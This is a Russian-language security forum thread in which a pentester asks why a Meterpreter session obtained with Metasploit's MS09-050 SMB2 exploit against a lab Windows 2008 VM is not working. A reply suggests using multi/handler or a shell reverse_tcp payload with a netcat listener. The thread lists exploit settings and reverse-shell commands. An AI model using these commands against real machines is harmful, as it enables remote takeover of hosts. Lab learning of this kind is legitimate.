• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

meterpreter и nc

FlowLight

Green Team
31.07.2017
29
31
BIT
0
Доброго времени господа pentesterы!
Я прошу просвещения!

Раньше , для получения meterpretera я генерил payload c помощью FATRAT и с помощью СИ доставлял его на целевую машину, а с помощью ngrok ловил реверс. Сейчас же я его не заливаю на целевой ПК , а задаю следующие параметры на своей машине и ловлю реверс.

Вопрос ! Почему мне не удаётся получить полноценный meterpreter ? ПРОШУ О ПРОСВЯЩЕНИИ :(


Дело следующее :

1.Имеется испытуемая виртуалка win 2008 на ESXI с адресом 192.168.0.231 и атакцющая машина с адресом 192.168.0.238
2.Для получения meterpreter использую netcat
Задаю параметры :
use windows/smb/ms09_050_smb2_negotiate_func_index
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.0.231
set LHOST 192.168.0.238
set LPORT 4444
exploit

nc 192.168.0.238 4444

3.после получения meterpreter невозможно использовать такие команды как sysinfo , getuid и тд



Screenshot from 2018-10-31 13-49-12.png
 

pr0phet

Platinum
02.04.2018
358
496
BIT
9
Для метерпретера при приеме бэкконекта нужно использовать не неткат, а хендлер:
use exploit/multi/handler

Попробуй в качестве пайлоада указать
set payload windows/shell/reverse_tcp
Запуск нетката:
nc -lvp 4444

Пару ссылок по теме:
О создании пэйлоадов для разных платформ с помощью msfvenom
 
Последнее редактирование:
  • Нравится
Реакции: Vertigo и Vander
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!